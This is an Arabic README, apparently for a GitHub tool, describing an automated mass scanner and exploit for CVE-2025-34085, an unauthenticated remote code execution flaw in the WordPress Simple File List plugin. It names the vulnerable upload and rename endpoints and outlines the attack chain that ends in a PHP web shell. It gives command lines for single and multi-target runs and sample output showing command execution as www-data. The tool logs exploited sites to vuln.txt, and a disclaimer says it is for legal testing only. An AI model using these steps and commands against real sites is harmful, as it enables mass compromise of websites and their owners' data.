
ماسح ضوئي واستغلال آلي لـ CVE-2025-34085، وهو ثغرة تنفيذ أوامر عن بعد غير مصادقة (RCE) في إضافة Simple File List لووردبريس. يدعم المسح متعدد الأهداف، رفع شيل ويب، وتنفيذ أوامر عن بعد.
أداة آلية لاكتشاف واستغلال Remote Code Execution (RCE) غير المصادق عليه في إضافة WordPress Simple File List، خاصة تلك المعرضة لـ CVE-2025-34085.
مزودة بنظام تنظيف تلقائي للهدف ودعم متعدد الخيوط لتحقيق الكفاءة على نطاق واسع.
رفع ملف بدون مصادقة
/wp-content/plugins/simple-file-list/ee-upload-engine.phpإعادة تسمية الملف إلى .php
/wp-content/plugins/simple-file-list/ee-file-engine.phpتنفيذ الحمولة عن بُعد
python3 main.py -u http://target.com --cmd "id"
ضع قائمة الأهداف في ملف targets.txt، هدف واحد في كل سطر:
python3 main.py --cmd "uname -a"
| الوسيط | الوصف |
|---|---|
-u | هدف واحد (مثال: http://example.com) |
--cmd | الأمر الذي سيتم تنفيذه على الهدف (الافتراضي: id) |
--inline | استخدام الحمولة المضمنة (بدون معامل ?cmd=) |
[+] http://target.com | http://target.com/wp-content/uploads/simple-file-list/shell.php
uid=33(www-data) gid=33(www-data) groups=33(www-data)
سيتم حفظ الأهداف الناجحة تلقائيًا في ملف vuln.txt.
main.py — النص البرمجي الرئيسيtargets.txt — قائمة الأهدافclean_targets.txt — نتائج تطبيع عناوين URLvuln.txt — سجل الأهداف التي تم استغلالها بنجاحtargets.txtيُنصح مسؤولي مواقع ووردبريس بما يلي:
هذا المشروع مخصص فقط لـ التعلم والاختبار القانوني.
استخدامه لأغراض غير قانونية هو مسؤولية الأفراد أنفسهم.
Cyberlone Indonesia غير مسؤولة عن إساءة استخدام هذه الأدوات.
الترخيص: MIT License
يمكنك استخدامه وتعديله وتوزيعه بحرية لأغراض قانونية ومسؤولة.
Cyberlone Indonesia
🛠️ فريق البحث والاستغلال
🔗 GitHub: https://github.com/yukinime
👨💻 0xgh057r3c0n
🔗 GitHub: github.com/0xgh057r3c0n